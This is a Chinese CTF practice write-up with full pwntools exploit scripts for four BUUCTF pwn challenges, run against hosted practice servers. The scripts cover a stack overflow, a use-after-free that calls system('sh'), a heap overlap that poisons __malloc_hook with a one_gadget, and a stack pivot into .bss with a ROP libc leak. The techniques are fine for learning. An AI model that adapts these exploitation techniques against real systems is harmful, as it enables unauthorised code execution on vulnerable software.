

PWN-PRACTICE-BUUCTF-14

發布時間:2023/12/10 编程问答 32 豆豆

PWN-PRACTICE-BUUCTF-14

    • bbys_tu_2016
    • ciscn_2019_n_3
    • roarctf_2019_easy_pwn
    • gyctf_2020_borrowstack

bbys_tu_2016

棧溢出,覆蓋eip到printFlag函數

# Solve script for the BUUCTF practice binary bbys_tu_2016.
# The write-up describes the bug as a stack overflow whose saved return
# address is redirected to the binary's own printFlag function.
# NOTE(review): concatenating a str literal with p32() output assumes
# Python 2 str semantics; under Python 3 the filler would have to be bytes.
from pwn import *

# Number of filler bytes sent ahead of the 4-byte address.
FILLER_LEN = 24
# Presumably the address of printFlag in this build -- confirm against the ELF.
PRINT_FLAG_ADDR = 0x0804856D

# io = process('./bbys_tu_2016')  # local run instead of the hosted instance
io = remote('node4.buuoj.cn', 27817)
elf = ELF('./bbys_tu_2016')

# io.recvuntil('feed it.\n')
overflow = 'a' * FILLER_LEN + p32(PRINT_FLAG_ADDR)
io.sendline(overflow)
io.interactive()

ciscn_2019_n_3

參考:[BUUCTF]PWN——ciscn_2019_n_3

# Solve script for the BUUCTF practice binary ciscn_2019_n_3 (menu-driven note service).
# NOTE(review): concatenating a str literal with p32() output assumes
# Python 2 str semantics; under Python 3 the literal would have to be bytes.
from pwn import *

# context.log_level = "debug"
io = remote("node4.buuoj.cn", 29097)
# io = process("./ciscn_2019_n_3")  # local run instead of the hosted instance
elf = ELF("./ciscn_2019_n_3")


def new(index, btype, cont, cont_len=0):
    """Create note `index` through menu option 1.

    Type 1 is followed directly by the value prompt; any other type is
    asked for a length (`cont_len`) before the value.
    """
    io.sendlineafter("CNote > ", "1")
    io.sendlineafter("Index > ", str(index))
    io.sendlineafter("Type > ", str(btype))
    if btype != 1:
        io.sendlineafter("Length > ", str(cont_len))
    io.sendlineafter("Value > ", cont)


def delete(index):
    """Delete note `index` through menu option 2."""
    io.sendlineafter("CNote > ", "2")
    io.sendlineafter("Index > ", str(index))


def show(index):
    """Print note `index` through menu option 3 (not used below)."""
    io.sendlineafter("CNote > ", "3")
    io.sendlineafter("Index > ", str(index))


# gdb.attach(io)
# pause()

# Three type-1 notes at indexes 0..2.
for slot in range(3):
    new(slot, 1, "1")

# pause()

delete(0)
delete(1)

# pause()

system_plt = elf.plt["system"]
print(hex(system_plt))

# Type-2 note with length 0xc holding "sh\0\0" followed by system@plt.
# Presumably this allocation lands on the freed record of note 0, which the
# service still lets the client reference after deletion -- confirm against
# the binary or the referenced write-up.
record = "sh\x00\x00" + p32(system_plt)
new(3, 2, record, 0xc)

# pause()

# Index 0 is deleted a second time; the service accepting this is the
# behaviour the script depends on.
delete(0)

io.interactive()

roarctf_2019_easy_pwn

參考:【pwn】roarctf_2019_easy_pwn

# Solve script for the BUUCTF practice binary roarctf_2019_easy_pwn (menu-driven heap service).
# NOTE(review): concatenating str literals with p8()/p64() output assumes
# Python 2 str semantics; under Python 3 the literals would have to be bytes.
from pwn import *

# context.log_level = "debug"
# io = process("./roarctf_2019_easy_pwn")  # local run instead of the hosted instance
io = remote("node4.buuoj.cn", 28680)
elf = ELF("./roarctf_2019_easy_pwn")
libc = ELF("./libc-2.23-16-x64.so")


def create(size):
    """Menu option 1: allocate a chunk of `size` bytes."""
    io.sendlineafter("choice: ", "1")
    io.sendlineafter("size: ", str(size))


def write(index, size, content):
    """Menu option 2: send `content` for chunk `index`, declaring `size` bytes."""
    io.sendlineafter("choice: ", "2")
    io.sendlineafter("index: ", str(index))
    io.sendlineafter("size: ", str(size))
    io.sendlineafter("content: ", content)


def drop(index):
    """Menu option 3: free chunk `index`."""
    io.sendlineafter("choice: ", "3")
    io.sendlineafter("index: ", str(index))


def show(index):
    """Menu option 4: print chunk `index`."""
    io.sendlineafter("choice: ", "4")
    io.sendlineafter("index: ", str(index))


# gdb.attach(io)
# pause()

# Initial layout: chunk0..chunk6, in this order.
for chunk_size in (0x18, 0x18, 0x88, 0x88, 0x28, 0x28, 0x68):
    create(chunk_size)

# pause()

# The declared size is 10 larger than chunk0's allocation while the content is
# one byte longer than it; the extra byte is 0xb1.
# Presumably the service's length check lets that single byte through and it
# lands on the neighbouring chunk's size field -- confirm against the binary.
write(0, 0x18 + 10, "a" * 0x18 + p8(0xb1))
drop(1)

# pause()

create(0xa8)  # chunk1 again, now requested with the larger size
write(1, 0x20, "a" * 0x18 + p64(0x91))

# pause()

drop(2)
show(1)
io.recvuntil("content: ")
io.recv(0x20)  # skip the first 0x20 bytes of the printed content
# The next 8 bytes are treated as a libc pointer; 0x3C4B78 is the offset this
# script subtracts for the bundled libc build (value is build-specific).
libc_base = u64(io.recv(8)) - 0x3C4B78
print(hex(libc_base))

malloc_hook = libc_base + libc.sym["__malloc_hook"]
realloc = libc_base + libc.sym["__libc_realloc"]
# Candidate offsets into the bundled libc; only index 1 is used.
libc_one_gadget = [0x45216, 0x4526a, 0xf02a4, 0xf1147]
one_gadget = libc_base + libc_one_gadget[1]

# pause()

# Same size+10 pattern as above, this time on chunk4 with trailing byte 0xa1.
write(4, 0x28 + 10, "a" * 0x28 + p8(0xa1))
drop(5)
drop(6)

# pause()

create(0x98)  # chunk2
# 0x28 filler bytes, a 0x71 size word, then an address 0x23 below __malloc_hook.
fd_overwrite = "a" * 0x28 + p64(0x71) + p64(malloc_hook - 0x23)
write(2, len(fd_overwrite), fd_overwrite)

# pause()

create(0x68)  # chunk5
create(0x68)  # chunk6
# 0x13-8 filler bytes, then the one_gadget address and realloc+0x10.
hook_write = "a" * (0x13 - 8) + p64(one_gadget) + p64(realloc + 0x10)
write(6, len(hook_write), hook_write)

# pause()

create(0x88)

io.interactive()

gyctf_2020_borrowstack

棧遷移,到.bss段
但是要盡量往高地址處遷移,避免再次執行main函數時,申請的臨時變量的空間覆蓋got表

# Solve script for the BUUCTF practice binary gyctf_2020_borrowstack.
# Per the write-up: the stack is pivoted into .bss, and the pivot target should
# sit as high as possible so that the locals of a re-executed main() do not
# overwrite the GOT.
# NOTE(review): concatenating str literals with p64() output, and
# ljust(8, '\x00') on received data, assume Python 2 str semantics; under
# Python 3 these would have to be bytes.
from pwn import *

# context.log_level = 'debug'
# io = process('./gyctf_2020_borrowstack')  # local run instead of the hosted instance
io = remote('node4.buuoj.cn', 25331)
elf = ELF('./gyctf_2020_borrowstack')
libc = ELF('./libc-2.23-x64.so')

# Fixed addresses used by the script; presumably taken from the non-PIE
# binary -- confirm against the ELF.
bank_addr = 0x601080   # buffer the second input is written to (in .bss per the write-up)
leave_ret = 0x400699
pop_rdi = 0x400703
ret = 0x4004c9

puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
main_addr = elf.sym['main']

# First input: 0x60 filler bytes, then bank_addr and the leave_ret address.
io.recvuntil('what you want\n')
pivot = 'a' * (0x60) + p64(bank_addr) + p64(leave_ret)
io.send(pivot)

# Second input: 20 copies of the bare `ret` address ahead of the chain.
# Presumably this is the "move toward higher addresses" advice from the
# write-up -- confirm. The chain then calls puts(puts@got) and re-enters main.
io.recvuntil('stack now!\n')
leak_chain = (
    p64(ret) * 20
    + p64(pop_rdi)
    + p64(puts_got)
    + p64(puts_plt)
    + p64(main_addr)
)
io.send(leak_chain)

# Six bytes are read back and zero-padded to 8 before unpacking.
puts_addr = u64(io.recv(6).ljust(8, '\x00'))
print(hex(puts_addr))
libc_base = puts_addr - libc.sym['puts']

# Candidate offsets into the bundled libc; only index 1 is used.
ones = [0x45216, 0x4526a, 0xf02a4, 0xf1147]
onegadget = libc_base + ones[1]

# Second pass through main: 0x60+8 filler bytes followed by the computed address.
io.recvuntil('you want\n')
final = 'a' * (0x60 + 8) + p64(onegadget)
io.send(final)

io.recvuntil('stack now!')
io.send('1')
io.interactive()
